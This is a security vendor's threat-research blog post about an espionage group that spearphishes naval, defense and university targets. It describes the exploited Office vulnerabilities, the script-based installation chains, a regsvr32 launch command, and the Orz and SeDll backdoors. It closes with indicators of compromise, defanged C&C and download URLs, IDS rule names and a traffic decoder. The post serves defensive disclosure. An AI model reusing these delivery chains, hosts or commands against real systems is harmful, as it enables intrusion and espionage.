# Leviathan: Espionage actor spearphishes maritime and defense targets **[proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets](https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets)** October 16, 2017 ----- [Blog](https://www.proofpoint.com/us/blog) [Threat Insight](https://www.proofpoint.com/us/blog/threat-insight) Leviathan: Espionage actor spearphishes maritime and defense targets ----- October 16, 2017 Axel F, Pierre T **Overview** Proofpoint researchers are tracking an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe. Key takeaways from this research include: Industry targeting: The actor targets defense contractors, universities (particularly those with military research ties), legal organizations [3] and government agencies [3]. The actor has particular interest in naval industries including shipbuilding and related research Geographical targeting: Targeting includes United States, Western Europe, and South China Sea Tools: Custom JavaScript [malware known as “Orz” and “NanHaiShu”, Cobalt Strike, the SeDll JavaScript](https://www.proofpoint.com/us/threat-reference/malware) loader, and MockDll dll loader Delivery: Emailed attachments and URLs, often employing a fraudulent lookalike domain and stolen branding Exploitation: Microsoft Excel and Word documents with macros (sometimes password-protected), very recent [vulnerabilities such as CVE-2017-0199 and](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199) [CVE-2017-8759, and malicious Microsoft Publisher files](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759) Installation: JavaScript, JavaScript Scriptlets in XML, HTA, PowerShell, WMI, regsvr32, Squiblydoo Lateral Movement: The actor sometimes utilizes access at one compromised organization to attack the next. For example, compromised email accounts at one organization were used to send the next wave of malicious attachments to potential victims in the same industry. Similarly the actor attempts to compromise servers within victim organizations and use them for command and control (C&C) for their malware. This blog traces key activities connected to this actor and examines a number of their tools and techniques. Campaigns and details are presented in reverse chronological order to highlight the group’s most recent activities. **Delivery and Exploitation** _September 2017_ [On September 15 and 19, 2017, Proofpoint detected and blocked spearphishing emails from this group targeting a](https://www.proofpoint.com/us/threat-reference/spear-phishing) US shipbuilding company and a US university research center with military ties. Example emails used the subject “Apply for internship position” and contained an attachment “resume.rtf”. Another attachment, “ARLUAS_FieldLog_2017-08-21.doc” contained a “Torpedo recovery experiment” lure. The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign [1]. ----- _Figure 1: Example attachment resume.rtf from September 2017 campaign_ _August 2017_ Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors. Some of this activity was documented and observed by a fellow researcher [2]. Many of the documents, C&C domains, and payload domains abused the brand of a major provider of ships, submarines, and other vessels with military applications. Some of the documents exploited CVE-2017-0199 to deliver the payload. _Figure 2: One of the documents involved in the campaign used Microsoft licensing lures purporting to be from a well-_ _known shipbuilder (sha256: 6f6ee01e9dc2d8c4c260ef4131fe88dc152e53ee8afd3e66e92d4e1bf5fd2e92)._ Other documents were Microsoft Publisher files that relied on social engineering. The potential victims were lured into starting an embedded PowerPoint presentation, moving the mouse to trigger execution of an embedded JavaScript [5], and then pressing “Enable” in a warning dialog to cause the payload download. The Publisher files were poorly crafted, relied on multiple user interactions, and contained multiple grammatical and typographic errors. ----- _Figure 3: Publisher document delivered via a link in email is in Italian, and is a simple reuse of a student’swork._ _February 2015_ From February to October of 2015, our colleagues at F-Secure and McAfee reported on campaigns [3][4] by this actor targeting South China Sea interests. During this time, the group utilized Microsoft Excel and Word documents with macros to target the Philippines Department of Justice, APEC organizers, and an international law firm. Targeting of these companies is different from that which we typically observe for this actor; however it still centers around marine and naval issues as related to South China sea politics. _Figure 4: Example attachment “DOJ Staff bonus January 13, 2015.xls”. Similar to this document attachment, most of_ _the attachments in this campaign did not contain meaningful content_ _November 2014_ The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor. The actor generally emailed Microsoft Excel documents with malicious macros to US universities with military interests, most frequently related to the Navy. The actor also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations with military and intelligence ties during this period. Emails were often very simple with a greeting and an attachment. On other occasions, it appears that the attackers used highly topical lures based on current events or legitimate documents stolen from previous victims. Lure topics included symposia, the Navy, IT, and relevant research. ----- _Figure 5: Example Excel attachment “2014 Accomplishments Input Template.xls”_ **Installation** The actor continues to: Innovate and modify the code that accomplishes the installation, while the backdoor code remains more static Use scripting languages such as JavaScript, JavaScript Scriptlets, VBScript, and XML Use simple obfuscation such as base64, gzip compression, and insertion of garbage characters Split functionality of the backdoor & code that establishes persistence for the backdoor into separate files and scripts _Example 1: Resume.rtf_ The “resume.rtf” file from the September 19, 2017 attack retrieves the malicious SOAP WSDL definition named “readme.txt “ using an anonymous FTP logon to the attacker’s server. _Figure 6: SOAP WSDL definition (“readme.txt “)_ This definition in turn downloads a VBScript favicon.ico file, which then creates and runs two JavaScript files in the %TMP% directory: ----- _Figure 7: Code snipped showing VBScript dropping 2 JavaScript files_ The job of the smaller of the two JavaScripts is to establish a system autostart mechanism. It accomplishes this by deobfuscating another script, link.js, into %TMP%. Link.js in turn creates a shortcut file "Java(TM) Platform SE Auto Updater.lnk" in the "Startup" special folder pointing to the main backdoor JavaScript. _Figure 8: Code for establishing persistence after reboot (autostart mechanism)_ The job of the larger of the two JavaScripts is to download and execute the Cobalt Strike payload. It accomplishes this by writing more code to rWug5n0PHUFjDFyb8k.js in the temporary directory, which then runs a PowerShell command (obfuscated using garbage characters, base64 encoding, and Gzip compression). The PowerShell is a default Cobalt Strike downloader. _Figure 9: PowerShell code downloading Cobalt Strike_ _Example 2: Malicious Microsoft Publisher document_ The malicious script executed by the Microsoft Publisher file downloads and runs yet another JavaScript file, 0.js, hosted on the attacker-controlled server: ----- _Figure 10: Malicious script executed by the Microsoft Publisher file (sha256:_ _305f331bfb1e97028f8c92cbcb1dff2741dcddacc76843e65f9b1ec5a66f52bc)_ Similar to the previous example (resume.rtf), the 0.js handles the system autostart mechanism via a shortcut file "office 365.lnk" in the "Startup" special folder. However, the shortcut abuses the “Squiblydoo” technique [6]. Moreover, the backdoor is not run directly but via an intermediary SeDll (see below). 0.js also downloads two additional files from the C&C server (green.ddd and green.tmp) The first of these files, green.ddd, is an executable file internally named “SEDll_Win32.dll”. This is a known backdoor used by this actor since 2014 for the same purpose: decrypting and executing the final JavaScript backdoor “Orz”. **Tools** _NanHaiShu_ We have observed variants of this JavaScript backdoor used in various campaigns, including those publically reported. The actor continues to improve and refine the malware by, for example, wrapping it inside an HTA wrapper. Several good descriptions are available in analyses from fellow researchers [3][4]. Basic functionality includes: Information gathering (computer name, user name, serial number, proxy server) Downloading from URL Executing other JavaScript Registry, system, process, directory, file operations SafeIE (change IE settings to reduce warnings about about malware activity) ----- _Figure 11: Screenshot from 2015 version of the malware dropped by “DOJ Staff bonus January 13, 2015.xls”_ _Orz_ We observed this backdoor in an August 2017 campaign dropped by the Microsoft Publisher files, as well as much earlier in 2014. We named it due to a variable name “orz”, which is changed to “core” in the more recent version. The actor consistently tweaks and improves this backdoor as well. The backdoor is a fairly involved script malware. Its functionality includes: Information gathering (IE version, OS version, OS 64-bit/32-bit, etc) Overwriting registry settings to reduce malware visibility on system Download file Upload file Execute a command with cscript Execute JavaScript Execute shell command Execute a dll (via an embedded ‘MockDll') Get proxy info Get process list Terminate process Get drive info GET request to a URL POST request to a URL ----- _Figure 12: Snippet of the Orz backdoor code delivered by the the Microsoft Publisher document. The URL domain is_ _a fraudulent lookalike domain._ There is an extensive configuration section at the top of the script. The "jmpUrlList" provides the initial C&C servers, which are used to determine the secondary C&C server as well as additional commands to execute. It is worth noting that the secondary C&C may be the same as the first. We have observed attacker-controlled web servers, compromised victim web servers, and Technet and Pastebin web pages used for the initial C&C. The initial C&C response is parsed with a regex. The backdoor first looks for the secondary encoded C&C server using the "jmpRegex" regex. Next, the backdoor looks for additional code to execute using the "codeRegex" regex. For additional code, we observed simple code blocks that provide a different upload/download functionality. _Figure 13: The encoded response "vcmQx3ELgTyTyOVSvsm7wrBKwraFw8VFwCuL" in the image above decodes to_ _"hxxp://www.vitaminmain[.]info" which is the secondary C&C server for an older backdoor variant (Decoder provided_ _in Appendix)._ ----- _MockDll_ Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is to simply run another binary. These are used as loaders for future executable payloads, using the wellknown process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14: _Figure 14: MockDll configuration file_ mock: defaults to 'regsvr32' real: the dll, which is the ultimate goal to execute args: arguments to the dll that will be executed, if any outf: file in which to write results of the MockDll run time: timeout defaults to 5 After the configuration file is created, the MockDll is executed with regsvr32. MockDll reads the mentioned .ini config file to determine what to execute. It can log its execution results into a file specified by the “outf” parameter, as shown in Figure 15: _Figure 15: Contents of the log file created by MockDll_ _SeDll_ This DLL is used for decrypting and executing another JavaScript backdoor such as Orz. The DLL is registered by the installer using regsvr32. The DllRegisterServer export is then called, which performs checks on the commandline parameter. If the string “DR” is passed as an argument, or if the DLL is running in the active session with a username that is not “system”, the final JavaScript backdoor is decoded using a custom base64 alphabet. This backdoor has to be present in the same directory as the dll, with a “.tmp” file extension. The backdoor script is then executed using the IActiveScript and IActiveScriptParse32 COM interfaces. ----- _Figure 16: Decoding and executing of the JavaScript backdoor_ If those conditions are not met, it runs the following command line “"regsvr32 /s \"%s\" DR __CIM__"” to register the DLL, where %s is the path to the DLL. It tries to do this with the current user privileges, but if the privileges cannot be adjusted it defaults to the available execution environment. _Cobalt Strike_ This is a penetration testing tool. The attackers often abuse the free trial version. **Conclusion** This actor, whose espionage activities primarily focus on targets in the US and Western Europe with military ties, has been active since at least 2014. The tools, techniques, and targets consistently connect their work, particular given their attention to naval and maritime defense interests and use of custom backdoors. While defense contractors and academic research centers with military ties should always be cognizant of the potential for cyberattacks, organizations fitting their targeting profiles should be especially wary of legitimate-looking but unsolicited emails from outside entities. Appropriate layered defenses at the firewall, email gateway, and endpoint can all help prevent the kinds of lateral movement we have observed with this actor, as well as the compromise and abuse of systems via which this group expands its attack surface to other organizations. **References** [1] [https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html](https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html) [2] [https://twitter.com/James_inthe_box/status/893525493059788800](https://twitter.com/James_inthe_box/status/893525493059788800) [3] [https://labsblog.f-secure.com/2016/08/04/nanhaishu-rating-the-south-china-sea/](https://labsblog.f-secure.com/2016/08/04/nanhaishu-rating-the-south-china-sea/) [4] https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-socialengineering [5] [http://blog.trendmicro.com/trendlabs-security-intelligence/mouseover-otlard-gootkit/](http://blog.trendmicro.com/trendlabs-security-intelligence/mouseover-otlard-gootkit/) [6] https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-nativeos-tools-to-live-off-the-land/ **Indicators of Compromise (IOCs)** **IOC** **IOC** **Type** **Description** ----- cdf6e2e928a89cbb857e688055a25e37a8d8b8b90530bd52c8548fb544f66f1f SHA256 Resume.rtf exploiting CVE-2017-8759 (Sep 19, 2017) c7fa6f27ec4f4142ae591f2dd7c63d046431945f03c87dbed88d79f55180a46d SHA256 ARLUAS_FieldLog_201708-21.doc exploiting CVE-2017-8759 (Sep 19, 2017) ftp://185.106.120[.]206/pub/readme.txt URL Resume.rtf downloading scripts (Sep 19, 2017) hxxp://185.106.120[.]206/favicon.ico URL Resume.rtf downloading scripts (Sep 19, 2017) 39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36 SHA256 Favicon.ico (Sep 19, 2017) 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362 SHA256 Cobalt Strike (Sep 19, 2017) ced7ca9625543d3d3d09f70223cc19f0d99e21792854452df5ba84b3a59d17b8 SHA256 20170720_final_pm_app2.doc (August 2017)Document hash (August 2017) 305f331bfb1e97028f8c92cbcb1dff2741dcddacc76843e65f9b1ec5a66f52bc SHA256 Publisher hash (August 2017) bfc5c6817ff2cc4f3cd40f649e10cc9ae1e52139f35fdddbd32cb4d221368922 SHA256 MockDll 32-bit (August 2017) 80b931ab1798d7d8a8d63411861cee07e31bb9a68f595f579e11d3817cfc4aca SHA256 MockDll 32-bit (August 2017) 146aa9a0ec013aa5bdba9ea9d29f59d48d43bc17c6a20b74bb8c521dbb5bc6f4 SHA256 green.ddd SeDll (August 2017) 4029b43c7febd05e8bf013c1022244aaa238341ca44bbce2250667614c1a4932 SHA256 2014 Accomplishments Input Template.xls (December 2014) hxxp://www.vitaminmain[.]info URL Orz secondary C2 (December 2014) **ET and ETPRO Suricata/Snort Coverage** 2024192 | ET EXPLOIT Possible CVE-2017-0199 HTA Inbound 2024196 | ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199 2022520 | ET POLICY Possible HTA Application Download ----- 2024197 | ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE 2017 0199) 2024449 | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl 2814013 | ETPRO TROJAN Meterpreter or Other Reverse Shell SSL Cert 2023629 | ET INFO Suspicious Empty SSL Certificate - Observed in Cobalt Strike 2810628 | ETPRO TROJAN JavaScript Backdoor CnC Beacon M2 (b64 3) 2828317 | ETPRO TROJAN Orz JavaScript Backdoor Communicating with CnC 2828316 | ETPRO TROJAN Orz JavaScript Backdoor Sending Password to CnC **Appendix: Orz Traffic Decoder** var _keyStr = "oMZF/W42VkcCbqOiPSajhnKtQws8NRAxr16XJpu=0mgE3THGLlvz9+5BDYd7feyUI"; function decode (input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = this._keyStr.indexOf(input.charAt(i++)); enc2 = this._keyStr.indexOf(input.charAt(i++)); enc3 = this._keyStr.indexOf(input.charAt(i++)); enc4 = this._keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } ----- output this._utf8_decode(output); return output; } function _utf8_decode (utftext) { var string = ""; var i = 0; var c = c1 = c2 = 0; while ( i < utftext.length ) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if((c > 191) && (c < 224)) { c2 = utftext.charCodeAt(i+1); string += String.fromCharCode(((c & 31) << 6) | (c2 & 63)); i += 2; } else { c2 = utftext.charCodeAt(i+1); c3 = utftext.charCodeAt(i+2); string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63)); i += 3; } } return string; } var decodeme = "s2S9NF0GCBRBRvY9s2pzN5nHsBk+N2oT8KWvsKYpNBpzR4nTNvYGNuNdOFoDbZeTQtkm8unzAtq9wK+zCLII" var res = decode(decodeme); document.write(res); Subscribe to the Proofpoint Blog -----